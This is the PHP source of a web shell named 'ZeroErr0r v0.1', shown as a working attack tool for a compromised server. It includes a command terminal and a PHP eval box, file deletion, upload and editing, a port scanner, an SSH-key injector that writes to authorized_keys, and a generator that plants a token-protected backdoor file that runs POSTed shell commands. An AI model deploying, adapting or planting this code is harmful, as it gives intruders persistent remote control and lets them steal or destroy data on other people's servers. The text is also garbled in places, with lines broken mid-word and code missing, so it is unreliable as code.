Zero PHP

<?
php
session_start();
// error_reporting(0);
if (isset($_POST['password'])) {
if (md5($_POST['password']) == 'bf211b896d1233e0b9fc5acb604b0329') {
$_SESSION['password'] = $_POST['password'];
header("Location: ?");
} else {
}
}
// ssh key injector
if (isset($_POST['inject_key'])) {
$key = $_POST['pub_key'];
// TODO: make this method works on windows servers
// this is only for linux server
chdir($_SERVER['DOCUMENT_ROOT'] . "/..");
if (file_exists(getcwd() . "/.ssh")) {
if (!is_writable((getcwd() . '/.ssh'))) {
header("Location: ?view=injector&action=ssh&msg=" . base
64_encode("permission denied"));
die();
}
} else {
if (!is_writable(getcwd())) {
header("Location: ?view=injector&action=ssh&msg=" . base
64_encode("permission denied"));
die();
}
mkdir(getcwd() . "/.ssh");
}
$key_file = fopen(getcwd() . "/.ssh/authorized_keys", "a+");
fwrite($key_file, $key);
fclose($key_file);
chdir($_SESSION['cd']);
header("Location: ?view=injector&action=ssh&msg=" . base64_encode("ssh k
ey injected successfully!"));
}
function download($filename){
if(!empty($filename)){
// Specify file path.
$path = ''; // '/uplods/'
$download_file = $path.$filename;
// Check file is exists on given path.
if(file_exists($download_file)) {
// Getting file extension.
$extension = explode('.',$filename);
$extension = $extension[count($extension)-1];
// For Gecko browsers
header('Content-Transfer-Encoding: binary');
header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($path)) . '
GMT');
// Supports for download resume
header('Accept-Ranges: bytes');
// Calculate File size
header('Content-Length: ' . filesize($download_file));
header('Content-Encoding: none');
// Change the mime type if the file is not PDF
header('Content-Type: application/'.$extension);
// Make the browser display the Save As dialog
header('Content-Disposition: attachment; filename=' . $filename);
readfile($download_file);
exit;
}
else {
header("Location: ?msg=" . base64_encode('File does not exists on given pa
th'));
}
}
}
if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'down
load') {
download($_GET['view']);
}
if (isset($_GET['action']) AND $_GET['action'] == 'logout') {
session_destroy();
die();
}
function delete_directory($dirname) {
if (is_dir($dirname))
$dir_handle = opendir($dirname);
if (!$dir_handle)
return false;
while($file = readdir($dir_handle)) {
if ($file != "." && $file != "..") {
if (!is_dir($dirname."/".$file))
unlink($dirname."/".$file);
else
delete_directory($dirname.'/'.$file);
}
}
closedir($dir_handle);
rmdir($dirname);
return true;
}
if (isset($_GET['cd'])) {
$_SESSION['cd'] = base64_decode($_GET['cd']);
}
if (isset($_GET['rmdir'])) {
$file = realpath(base64_decode($_GET['rmdir']));
if (file_exists($file)) {
if (is_writable($file)) {
delete_directory($file);
header("Location: ?msg=" . base64_encode($file . " has b
een deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permission den
ied!"));
}
}
}
if (isset($_GET['rmfile'])) {
$file = realpath(base64_decode($_GET['rmfile']));
unlink($file);
header("Location: ?msg=" . base64_encode($file . " has b
een deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permission den
ied!"));
}
}
}
if (isset($_GET['multirmfile'])) {
for ($i = 0; $i < intval($_GET['multirmfile']); $i++) {
$file = realpath(base64_decode($_GET['rmfile' . $i]));
if (is_dir($file)) {
rmdir($file);
} else {
unlink($file);
}
header("Location: ?msg=" . base64_encode("select
ed file(s) has been deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permis
sion denied!"));
}
}
}
}
if (isset($_SESSION['cd'])) {
}
if (isset($_GET['to']) AND isset($_GET['from'])) {
$from = base64_decode($_GET['from']);
$to = $_GET['to'];
if (is_writable($from)) {
if (file_exists($from)) {
rename($from, getcwd() . '/' . $to);
header('Location: ?msg=' . base64_encode("file renamed s
uccessfully!"));
} else {
header("Location: ?msg=" . base64_encode("file doesn't e
xist"));
}
} else {
header("Location: ?msg=" . base64_encode("permission denied!"));
}
}
function formatSizeUnits($bytes) {
if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824,
2) . ' GB'; }
elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2)
. ' MB'; }
elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' K
B'; }
elseif ($bytes > 1) { $bytes = $bytes . ' B'; }
elseif ($bytes == 1) { $bytes = $bytes . ' B'; }
else { $bytes = '0 B'; }
return $bytes;
}
function formatPerms($perms) {
switch ($perms & 0xF000) {
case 0xC000: // socket
$info = 's';
break;
case 0xA000: // symbolic link
$info = 'l';
break;
case 0x8000: // regular
$info = 'r';
break;
case 0x6000: // block special
$info = 'b';
break;
case 0x4000: // directory
$info = 'd';
break;
case 0x2000: // character special
$info = 'c';
break;
case 0x1000: // FIFO pipe
$info = 'p';
break;
default: // unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function modifiedDate($filename) {
if (file_exists($filename)) {
return date ("M-d-Y H:i:s", filemtime($filename));
}
}
function ex($in) {
$out = '';
if(function_exists('exec')) {
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function which($p) {
$path = ex('which '.$p);
if(!empty($path))
return $path;
return false;
}
if (isset($_POST['edit'])) {
if (is_writable($_POST['dest'])) {
$file = fopen($_POST['dest'], 'w');
fwrite($file, $_POST['content']);
fclose($file);
header('Location: ?msg=' . base64_encode("file saved!"));
} else {
header('Location: ?msg=' . base64_encode("permission denied!"));
}
}
if (isset($_GET['touch']) AND isset($_GET['file'])) {
if (is_writable(dirname(base64_decode($_GET['touch'])))) {
$content = "";
$fp = fopen(base64_decode($_GET['touch']) . '/' . $_GET['file'],
"wb");
fwrite($fp,$content);
fclose($fp);
header("Location: ?msg=" . base64_encode($_GET['file'] . " has b
een created!"));
} else {
}
}
if (isset($_GET['mkdir_path']) AND isset($_GET['folder'])) {
if (is_writable(dirname(base64_decode($_GET['mkdir_path'])))) {
mkdir(base64_decode($_GET['mkdir_path']) . '/' . $_GET['folder']
);
header("Location: ?msg=" . base64_encode($_GET['folder'] . " fol
der has been created!"));
} else {
}
}
if (isset($_POST['upload'])) {
if (is_writable($_POST['path'])) {
$files = @$_FILES["files"];
$fullpath = $_POST['path'] . "/" . $files["name"];
// if (file_exists($fullpath)) {
// header("Location: ?msg=" . base64_encode("file already e
xist!"));
// die();
// }
if ($files["name"] != '') {
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
header("Location: ?msg=" . base64_encode("file u
ploaded to $fullpath"));
} else {
header("Location: ?msg=" . base64_encode("an err
or occured!"));
}
}
} else {
header("Location: ?msg=" . base64_encode(base64_decode('permissi
on denied!')));
}
}
if ($_SERVER['REQUEST_METHOD'] == 'POST' AND isset($_POST['qpath'])) {
header("Location: ?cd=" . base64_encode($_POST['qpath']));
}
if (isset($_GET['action']) AND isset($_GET['numfiles']) AND $_GET['action'] == '

zip') {
$zip = new ZipArchive();
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$tmp = explode('\\', getcwd());
} else {
$tmp = explode('/', getcwd());
}
if($zip->open(getcwd() . "/" . $tmp[count($tmp) - 1] . ".zip", ZipArchiv
e::CREATE) === TRUE) {
for ($i = 0; $i < intval($_GET['numfiles']); $i++) {
// $zip->addFromString(basename(getcwd() . '/cx.txt'),
file_get_contents(getcwd() . '/cx.txt'));
$file = base64_decode($_GET['file' . $i]);
if (!is_dir($file)) {
$zip->addFile(basename($file));
}
}
$zip->close();
header("Location: ?msg=" . base64_encode("selected files has bee
n compressed and downloaded."));
} else {
echo "Failed!";
header("Location: ?msg=" . base64_encode("failed to create a zip
file"));
}
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>- ZerroErr0r v0.1</title>
<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn
.com/font-awesome/4.7.0/css/font-awesome.min.css">
<style type="text/css">
.hljs{display:block;overflow-x:auto;padding:.5em;background:#071
414;color:#e6e1dc}.hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}.hlj
s-keyword,.hljs-selector-tag{color:#c26230}.hljs-number,.hljs-regexp,.hljs-strin
g,.hljs-template-variable,.hljs-variable{color:#a5c261}.hljs-subst{color:#519f50
}.hljs-name,.hljs-tag{color:#e8bf6a}.hljs-type{color:#da4939}.hljs-attr,.hljs-bu
ilt_in,.hljs-builtin-name,.hljs-bullet,.hljs-link,.hljs-symbol{color:#6d9cbe}.hl
js-params{color:#d0d0ff}.hljs-attribute{color:#cda869}.hljs-meta{color:#9b859d}.
hljs-section,.hljs-title{color:#ffc66d}.hljs-addition,.hljs-deletion{color:#e6e1
dc;display:inline-block;width:100%}.hljs-addition{background-color:#144212}.hljs
-deletion{background-color:#600}.hljs-selector-class{color:#9b703f}.hljs-selecto
r-id{color:#8b98ab}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:700
}.hljs-link{text-decoration:underline}
</style>
<script type="text/javascript">
window.addEventListener('load', function() {
var boxes = document.getElementsByClassName('box');
for (var i = 0; i < boxes.length; i++) {
boxes[i].innerHTML += "<span class='c1'></span><
span class='c2'></span><span class='c3'></span><span class='c4'></span>";
}
}, false);
</script>
<style type="text/css">
@import url(https://fonts.googleapis.com/css?family=Electrolize)
;body,h1,h2,h3,h4,h5,nav ul{margin:0;padding:0}nav li a,nav li a:hover{transitio
n:all .2s ease}nav li a,section a{text-decoration:none}nav li,nav li a{display:i
nline-block}.logo span,body,form textarea,section a:hover{color:#AAA}.error,foot
er{text-align:right}body{background-color:#071414;font-family:Electrolize,monosp
ace,sans-serif,arial}header{padding:20px;border:1px solid #BBB;margin:20px}heade
r .logo{float:left;position:relative;top:3px}header .info{float:right;text-trans
form:uppercase}.logo span{opacity:.7}nav{padding:0 20px;}nav li a{padding:4px 15
px;color:#E3052B;}nav li a:hover{text-decoration: line-through;}section{margin:2
0px;border:1px solid #E3052B;}section .content{padding:20px}section .title{backg
round-color:#0E1A1F;padding:10px 20px;border-bottom:1px solid #85001A}section ta
ble{width:100%}section table td{padding:5px 15px}section table .td_head td{paddi
ng:0 15px 20px;text-transform:uppercase}section table tr:hover{background-color:
#1A272E}section table tr:first-child:hover{background-color:transparent}section
a{color:#EF330E}.error{padding:10px 20px;background-color:#E3052B; text-align:ce
nter;color:#EEE;}img{max-width:100%}pre{overflow:auto}pre code{font-size:1rem}fo
rm textarea{width:100%;display:block;border:none;height:500px;background-color:t
ransparent;resize:none;font-size:1.2rem;outline:0}form input[type=submit],form s
elect{padding:5px 20px;font-family: 'Electrolize', monospace;border:1px solid #E
3052B;display:inline-block;margin-top:20px;font-size:1rem;background-color:trans
parent;color:#E3052B;cursor:pointer;outline:none;}form select{background-color:#
071414;outline:0}form input[type=submit]:hover{background-color:#85001A;color:#A
AA}form input[type=text]{border:none;background-color:transparent;font-size:1.1r
em;width:80%;outline:0;color:#EF330E;font-family:monospace}.light_red{color:#E30
52B}.dark_red{color:#85001A}.orange{color:#EF330E}.light_black{color:#0E1A1F}.da
rk_black{color:#071414}.clearfix:after{content:'';display:table;clear:both}::-we
bkit-scrollbar{width:8px}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0
6px rgba(0,0,0,.3);border-radius:10px}::-webkit-scrollbar-thumb{background-color
:#85001a}footer{padding:20px;opacity:.2}.result{margin-top:20px;padding:10px;bac
kground-color:#1A272E}#login input{background-color:transparent;border:1px solid
#E3052B;width:100%;box-sizing:border-box;padding:10px 20px;display:block;margin
-top:5px;color:#E3052B;outline:0}#login{width:300px;}#login input[type=submit]{m
argin-top:15px}#login input[type=submit]:hover{background-color:#85001A;color:#A
AA}form .title{border: none;width: 100%;color:#AAA;font-size: 1.1rem;font-family
: 'Electrolize', monospace; box-sizing: border-box;border-bottom: 1px solid #E30
52B; outline: none;}.box { border: 2px solid #85001A; }.box .c1, .box .c2, .box
.c3, .box .c4 { display: block; position: absolute; width: 5px; height: 3px; bac
kground-color: #EEE; }.box .c1 { top: -2px; left: -2px; }.box .c2 { top: -2px; r
ight: -2px; }.box .c3 { bottom: -2px; right: -2px; }.box .c4 { bottom: -2px; lef
t: -2px; }header { position: relative; }header .logo p, header .logo{font-weight
: lighter;padding: 0;margin: 0;top:0;}section{position: relative;}#login p{margi
n: 0;}#login{position: absolute; top: 50%; left: 50%; transform: translate(-50%,
-50%);}#login .content{padding: 20px;}#login .title{padding: 10px 20px;border-c
olor: #85001A;border-width: 2px;}#login .content input {border-color: #85001A;}s
elect {font-family: 'Electrolize', monospace;padding: 0 20px;}pre {white-space:
pre-wrap;white-space: -moz-pre-wrap;white-space: -pre-wrap;white-space: -o-pre-w
rap;word-wrap: break-word;}.view_action, .action_menu{padding: 10px 20px;border-
bottom:2px solid #85001A;position: relative;}.view_action button, .action_menu b
utton{outline:none;border: 1px solid #E3052B;background-color: transparent;color
: #E3052B;padding: 5px 15px;display: inline-block;cursor: pointer;font-family: '
Electrolize', monospace;}.view_action button:hover, .action_menu button:hover{ba
ckground-color: #85001A;color: #EEE;}.file_select{opacity: 0;}tr:hover .file_sel
ect{opacity: 1;}.file_select{margin: 0;padding: 0;cursor: pointer;outline: none;
}.action_menu{display: none;}.info_head{padding: 10px 20px;background-color: #85
001A;cursor: pointer;margin: 5px 0 0 0;}.server_info table { border:1px solid #8
5001A;}.server_info table td { border: 0.1px solid #333; }.server_info table tr:
hover {background-color: transparent;}.off{display: none;}.port_scanner input[ty
pe='text']{display: inline-block; padding: 10px;border:1px solid #E3052B;width:
100%;box-sizing: border-box;}.port_scanner tr:hover{background-color: transparen
t;}.port_scanner td {padding: 3px 0;}
</style>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.10.0/highli
ght.min.js"></script>
</head>
<body>
<?php if (!isset($_SESSION['password'])) { ?>
<form action="" method="post" id="login" class="box">
<p class="title">PASSWORD</p><br>
<div class="content">
<input type="text" name="password" style="-webkit-text-security: square;
font-size: 1.3rem; text-align: center;padding: 5px;-webkit-text-security: square
;letter-spacing: 3px;padding-bottom: 8px;font-family: 'Electrolize', monospace;"
autocomplete="off" spellcheck="false" autofocus>
<input type="submit" name="login" value="GET IN!" style="font-family: 'E
lectrolize', monospace;font-size: 1rem;">
</div>
</form>
<?php die(); } ?>
<header class="clearfix box">

<div class="logo">
<p>ZeroErr0r <span>v0.1</span></p>
</div>
<div class="info">
Server IP: <?php echo gethostbyname($_SERVER['SERVER_NAME']) ?>
</div>
</header>
<nav>
<ul>
<li><a href="?">explorer</a></li>
<li><a href="?view=evaluate">evaluate</a></li>
<li><a href="?view=info">info</a></li>
<li><a href="?view=terminal">terminal</a></li>
<li><a href="?view=port_scanner">port scanner</a></li>
<li><a href="?view=injector">injector</a></li>
<li><a href="?view=database">database</a></li>
<li><a href="?action=logout"><i class="fa fa-sign-out"></i> logo
ut</a></li>
</ul>
</nav>
<section class="box">
<?php if (isset($_GET['msg'])) { ?>
<div class="error"><?php echo base64_decode($_GET['msg']) ?></div>
<?php } ?>
<script>
function showAction() {
var s = document.getElementsByClassName('file_select');
var m = document.getElementsByClassName('action_menu')[0
];
for (var i = 0; i < s.length; i++) {
if (s[i].checked) {
m.style.display = 'block';
break;
} else {
m.style.display = 'none';
}
}
}
</script>
<div class="action_menu">
<button onclick="filesDelete()"><i class="fa fa-trash"></i> Dele
te</button>
<button onclick="filesCompress()"><i class="fa fa-download"></i>
Compress</button>
</div>

<?php if (isset($_GET['view']) AND isset($_GET['action']) AND isset($_GE
T['img']) AND $_GET['action'] == 'display') { ?>
<div class="view_action">
<a href="?view=<?php echo $_GET['view'] ?>&action=edit">
<button><i class="fa fa-pencil"></i> Edit</button></a>
<a href="?view=<?php echo $_GET['view'] ?>&action=downlo
ad"><button><i class="fa fa-download"></i> Download</button></a>
<a href="?rmfile=<?php echo base64_encode($_GET['view'])
?>"><button><i class="fa fa-trash"></i> Delete</button></a>
<a href="?"><button><i class="fa fa-close"></i> Close</b
utton></a>
</div>
<?php } ?>
<?php if (isset($_GET['view']) AND $_GET['view'] == 'injector') { ?>
<div class="view_action">
<a href="?view=<?php echo $_GET['view'] ?>"><button><i c
lass="fa fa-asterisk"></i> Basic Injector</button></a>
<a href="?view=<?php echo $_GET['view'] ?>&action=ssh"><
button><i class="fa fa-exchange"></i> SSH Injector</button></a>
</div>
<?php } ?>
<form action="" method="POST">
<input class="title" value="<?php echo getcwd(); ?>" name="qpath
" spellcheck="false" autocomplete="off" style="border-color: #85001A;border-widt
h: 2px;">
</form>
<div class="content">
<?php if (!isset($_GET['view'])) { ?>
<table>
<tr class="td_head">
<td>name</td>
<td>size</td>
<td>permissions</td>
<td>modified</td>
<td>action</td>
</tr>
<?php
// echo getcwd() . "<br>";
// chdir("..");
// echo getcwd();
$directories = array();
$files_list = array();
if ($handle = opendir('.')) {
while (false !== ($entry = readdir($handle))) {
if (is_dir($entry)) {
$directories[] = $entry;
} else {
$files_list[] = $entry;
}
}
closedir($handle);
}
asort($directories);
foreach ($directories as $dir) {
if ($dir != "." && $dir != "..") {
$size = "Dir";
$perms = formatPerms(fileperms($dir));
$modified = modifiedDate($dir);
$link = "?cd=" . base64_encode(getcwd() . "/" .
$dir);
$del = "?rmdir=" . base64_encode(getcwd() . "/"
. $dir);
$down_path = getcwd() . "/" . $dir;
$path = base64_encode($down_path);
// $upload_path = realpath(dirname(__FILE__) . $
dir);
echo "<tr>";
echo "<td><input type='checkbox' class='file_select'
onclick='fileSelectCheck()' value='$path'> <a href='$link'><i class='fa fa-fold
er'></i> $dir</a></td>";
echo "<td>$size</td>";
echo "<td>$perms</td>";
echo "<td>$modified</td>";
echo "<td class='action'><a href='#' onclick='rename
(\"$path\")'>ren</a> - <a href='$del'>del</a> - <a href='?view=$down_path&action
=upload'>upl</a></td>";
echo "</tr>";
} else {
$size = "Link";
$perms = formatPerms(fileperms($dir));
$modified = modifiedDate($dir);
$down_path = getcwd() . "/" . $dir;
if ($dir == '..'){
$link = "?cd=" . base64_encode(getcwd()
. "/..");
$touch_path = base64_encode('..');
$mkdir_path = base64_encode('..');
$upload_dir = '..';
} else {
$link = "?cd=" . base64_encode(getcwd())
;
$touch_path = base64_encode($down_path);
$mkdir_path = base64_encode($down_path);
$upload_dir = getcwd();
}
echo "<tr>";
echo "<td><input type='checkbox' style='opacity:0;ma
rgin: 0;padding: 0;' disabled> <a href='$link'><i class='fa fa-folder'></i> $dir
</a></td>";
echo "<td class='action'><a href='?view=$upload_dir&
action=upload'>upl</a> - <a href='#' onclick='touch(\"$touch_path\")'>+file</a>
- <a href='#' onclick='mkdir(\"$mkdir_path\")'>+dir</a></td>";
echo "</tr>";
}
}
foreach ($files_list as $file) {
// if ($file != "." && $file != "..") {
$size = formatSizeUnits(filesize($file));
$perms = formatPerms(fileperms($file));
$modified = modifiedDate($file);
$del = "?rmfile=" . base64_encode(getcwd() . "/"
. $file);
// $down_path = realpath(getcwd() . "/" . $file)
;
$path = getcwd() . "/" . $file;
$rename_path = base64_encode($down_path);
$isimg = @is_array(getimagesize($file));
// echo "<p>$file <b>" . formatSizeUnits(filesize($f
ile)) . "</b></p>";
echo "<tr>";
echo "<td><input type='checkbox' class='file_select'
onclick='fileSelectCheck()' value='$rename_path'> <a href='?view=$path&action=d
isplay&img=$isimg'><i class='fa fa-file-text'></i> $file</a></td>";
echo "<td class='action'><a href='?view=$path&action
=edit'>edit</a> - <a href='#' onclick='rename(\"$rename_path\", \"$file\")'>ren<
/a> - <a href='$del'>del</a> - <a href='?view=$path&action=download'>dl</a></td>
";
echo "</tr>";
// }
}
?>
</table>
<?php } else if (isset($_GET['view']) AND isset($_GET['action'])
AND isset($_GET['img']) AND $_GET['action'] == 'display') { ?>
<?php $path_info = pathinfo($_GET['view']); ?>
<pre><code class="<?php echo $path_info['extension'] ?>"><?php
if (file_exists($_GET['view'])) {
if ($_GET['img'] === '1') {
$image = (strpos($_GET['view'], $_SERVER
['DOCUMENT_ROOT']) !== false) ? preg_replace('#'. $_SERVER['DOCUMENT_ROOT'] .'#'
, 'http://' . $_SERVER['HTTP_HOST'], $_GET['view']) : $_GET['view'];
// Read image path, convert to base64 en
coding
$imageData = base64_encode(file_get_cont
ents($image));
// Format the image SRC: data:{mime};ba
se64,{data};
$src = 'data: '. pathinfo($image, PATHIN
FO_EXTENSION) .';base64,'.$imageData;
// Echo out a sample image
echo '<img src="' . $src . '">';
} else {
$file = fopen($_GET['view'], 'r');
if (filesize($_GET['view']) > 0)
echo htmlspecialchars(fread($fil
e, filesize($_GET['view'])));
else
echo "Empty";
fclose($file);
}
}
?></code></pre>
AND $_GET['action'] == 'edit') { ?>
<?php
$file = fopen($_GET['view'], 'r');
if (filesize($_GET['view']) > 0)
$content = htmlspecialchars(fread($file, filesize($_GET[
'view'])));
else
$content = "";
fclose($file);
?>
<form action="" method="post">
<textarea name="content" spellcheck="false" autofocus><?
php echo $content ?></textarea>
<input type="hidden" name="dest" value="<?php echo $_GET
['view'] ?>">
<input type="submit" name="edit" value="Save!">
</form>
AND $_GET['action'] == 'upload') { ?>
<form action="" method="post" enctype="multipart/form-data" styl
e="border: 1px solid #AAA; padding: 20px;">
<p style="margin: 0;font-size: 1.2rem;">Local File Uploa
d</p>
<input type="hidden" name="path" value="<?php echo $_GET
['view'] ?>">
<input type="file" name="files">
<input type="submit" name="upload" value="Upload!">
</form>
<br><br>
<form action="" method="post" enctype="multipart/form-data" styl
e="border: 1px solid #AAA; padding: 20px;">
<p style="margin: 0;font-size: 1.2rem;">Remote File Uplo
ad</p>
<input type="hidden" name="path" value="<?php echo $_GET
['view'] ?>">
<input type="text" name="remote_file" placeholder="Remot
e File URL" style="border: 1px solid #EF330E; padding: 6px 20px; position: relat
ive;top:-1px; width: 200px;">
<input type="submit" name="remote_upload" value="Upload!
">
</form>

<?php } else if (isset($_GET['view']) AND $_GET['view'] == 'eval
uate') { ?>
<form action="?view=evaluate" method="post">
<textarea name="eval_code" spellcheck="false" st
yle="height: 200px;" autofocus><?php if (isset($_POST['eval_code'])) { echo $_PO
ST['eval_code']; } ?></textarea>
<input type="submit" name="eval" value="Go!">
<select name="language">
<option value="php">php</option>

</select>
</form>
<?php
if (isset($_POST['eval'])) {
$code = $_POST['eval_code'];
$lang = $_POST['language'];
echo '<pre class="result">';
if ($lang == 'php') {
eval($code);
}
echo '</pre>';
}
?>

<?php } else if (isset($_GET['view']) AND $_GET['view'] == 'info
') { ?>
<div class="server_info">
<p class="info_head" onclick="toggle(this)">Serv
er Info</p>
<table class="off">
<tr>
<td>Root Disk</td>
<td><?php echo (formatSizeUnits(
disk_total_space("/") - disk_free_space("/"))) . " / " . formatSizeUnits(disk_to
tal_space("/")); ?></td>
</tr>
<tr>
<td>PHP</td>
<td><?php echo phpversion() ?></
td>
</tr>
<tr>
<td>Python</td>
<td><?php if(which("python")) {
echo shell_exec("python --version 2>&1"); } ?></td>
</tr>
<tr>
<td>Curl</td>
<td><?php if(function_exists('cu
rl_version')) { $v = curl_version(); echo $v['version']; } ?></td>
</tr>
<tr>
<td>tar</td>
<td><?php if(which("tar")) { ech
o shell_exec("tar --version | grep ^tar | sed 's/^.* //g'"); } ?></td>
</tr>
<tr>
<td>Perl</td>
<td><?php if(which("perl")) { ec
ho shell_exec("perl -e 'print $];'"); } ?></td>
</tr>
<tr>
<td>GCC</td>
<td><?php if(which("perl")) { ec
ho shell_exec("gcc --version | grep ^gcc | sed 's/^.* //g'"); } ?></td>
</tr>
</table>
<p class="info_head" onclick="toggle(this)">PHP
Configuration</p>
<table class="off">
<?php
foreach (parse_ini_file(php_ini_loaded_f
ile()) as $key => $value) {
echo "<tr>";
echo "<td>" . $key . "</td>";
echo "<td>" . $value . "</td>";
echo "</tr>";
}
?>
</table>
</div>

<?php } else if (isset($_GET['view']) AND $_GET['view'] == 'term
inal') { ?>
<pre style="height: 300px;word-wrap: break-word;"><code
class="sh"><?php if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
if (strpos($_GET['cmd'], 'cd') !== false) {
$tmp = explode(" ", $_GET['cmd']);
$direct = getcwd() . "/" . $tmp[array_se
arch('cd', $tmp) + 1];
chdir($direct);
$_SESSION['cd'] = $direct;
echo "<script>document.location = '?view
=terminal';</script>";
}
$tmp = explode(" ", $_GET['cmd']);
if (array_search('edit', $tmp) === 0) {
$direct = getcwd() . "/" . $tmp[array_se
arch('edit', $tmp) + 1];
echo "<script>document.location = '?view
=" . urlencode($direct) . "&action=edit';</script>";
}
echo htmlentities(ex($cmd . " 2>&1"));
} ?></code></pre>
<br>
<form action="?" method="get">
<input type="hidden" name="view" value="terminal
">
<?php echo get_current_user(); ?>:
<input id="cmd" type="text" name="cmd" spellchec
k="false" autocomplete="off" value="" autofocus placeholder=" shell command -">
</form>

<?php } else if (isset($_GET['view']) AND $_GET['view'] == 'port
_scanner') { ?>
<form action="" method="post" class="port_scanner">
<table>
<tr>
<td width="10%">Host:</td>
<td width="90%"><input type="tex
t" name="host" value="localhost" autocomplete="off" spellcheck="false"></td>
</tr>
<tr>
<td width="10%">Port Start:</td>
t" name="sport" value="0" autocomplete="off" spellcheck="false"></td>
</tr>
<tr>
<td width="10%">Port End:</td>
t" name="eport" value="5000" autocomplete="off" spellcheck="false"></td>
</tr>
</table>
<input type="submit" name="scan" value="SCAN!">
</form>
<?php if (isset($_POST['scan'])) { ?>
<div class="result" style="background-color: #07
1414;padding: 0;padding-top: 20px;">
<table>
<?php
$start = strip_tags($_POST['spor
t']);
$end = strip_tags($_POST['eport']);
$host = strip_tags($_POST['host']);
for($i = $start; $i<=$end; $i++){
$fp = @fsockopen($host, $i, $errno,
$errstr, 3);
if($fp){
if ($i == 22 OR $i == 2222) {
echo '<tr><td width="5%"
style="background-color: #FFA800;"><font color=white>open</font></td><td width=
"95%" style="background-color: #1A272E;">Port '.$i.' this could be vulnerable to
SSH Injection</td></tr>';
} else {
echo '<tr><td width="5%"
style="background-color: #16A086;"><font color=white>open</font></td><td width=
"95%" style="background-color: #1A272E;">Port '.$i.'</td></tr>';
}
}
flush();
}
?>
</table>
</div>
<?php } ?>

<?php } else if (isset($_GET['view']) AND $_GET['view']
== 'injector') { ?>
<?php if (!isset($_GET['action'])) { ?>
<form action="" method="post" class="port_scanne
r">
<table>
<tr>
<td width="30%">Injectab
le File Path:</td>
<td width="70%"><input t
ype="text" name="inject_path" value="<?php echo getcwd() . DIRECTORY_SEPARATOR .
'config.php'; ?>" autocomplete="off" spellcheck="false"></td>
</tr>
<tr>
<td width="30%">Code Typ
e:</td>
<td width="70%"><select
name="inject_code_type">
<option value="r
everse_command">Reverse Command</option>
</select></td>
</tr>
<tr>
<td width="30%">Language
:</td>
<td width="70%"><select
name="inject_lang">
<option value="r
everse_command">PHP</option>
</select></td>
</tr>
</table>
<input type="submit" name="inject" value
="INJECT CODE!">
</form>
<?php if (isset($_POST['inject'])) { ?>
<pre class="result" style="font-
size: 1.3rem;"><?php
$path = strip_ta
gs($_POST['inject_path']);
$type = strip_tags($_POS
T['inject_code_type']);
$lang = strip_tags($_POS
T['inject_lang']);
$token = md5(rand(111111
, 999999));
$code = <<<EOF
<?php
session_start();
if (isset(\$_SESSION['cd'])) {
chdir(\$_SESSION['cd']);
}
if (\$_SERVER['REQUEST_METHOD'] == 'POST') {
\$cmd = base64_decode(\$_POST['cmd']) . " 2>&1";
if (\$_POST['token'] != '$token') {
echo "Error: invalid token!";
die();
}
if (strpos(\$cmd, 'cd') !== false) {
\$tmp = explode(" ", \$cmd);
\$direct = getcwd() . "/" . \$tmp[array_search('cd', \$t
mp) + 1];
chdir(\$direct);
\$_SESSION['cd'] = \$direct;
}
if (0 == posix_getuid()) {
\$isRoot = "#";
} else {
\$isRoot = "$";
}
echo get_current_user() . "{ZERO}" . getcwd() . "{ZERO}" . \$isR
oot . "{ZERO}" . shell_exec(\$cmd);
die();
}
?>
EOF;
$pathinfo = path
info($path);
if (is_writable(
$pathinfo['dirname'])) {
if (!fil
e_exists($path)) {
$file = fopen($path, 'w+');
fwrite($file, $code);
fclose($file);
echo "[+] Message: code has been injected!<br>";
echo "[+] Method: POST<br>";
echo "[+] URL: " . $_SERVER['HTTP_HOST'] . str_replace(str_replace(array('/', '\
\'), DIRECTORY_SEPARATOR, $_SERVER['DOCUMENT_ROOT']), "", $path) . "<br>";
echo "[+] Variable: cmd<br>";
echo "[+] Token: " . $token;
} else {
echo "File exist!";
}
} else { echo "[
-] Error: permission denied!"; }
?>
</pre><?php } ?>
<?php } else if (isset($_GET['action']) AND $_GE
T['action'] == 'ssh') { ?>
<form action="" method="post">
<textarea style="height: 200px;"
name="pub_key" placeholder="Enter the public key here!"></textarea>
<input type="submit" name="injec
t_key" value="INJECT KEY!">
</form>
<?php } ?>


<?php } else if (isset($_GET['view']) AND $_GET['view']
== 'database') { ?>
<form action="?view=database" method="post" class="port_
scanner">
<?php if (isset($_SESSION['mysql_user'])) { ?>
<select name="mysql_db">
<?php
$link = mysqli_connect($_SESSION
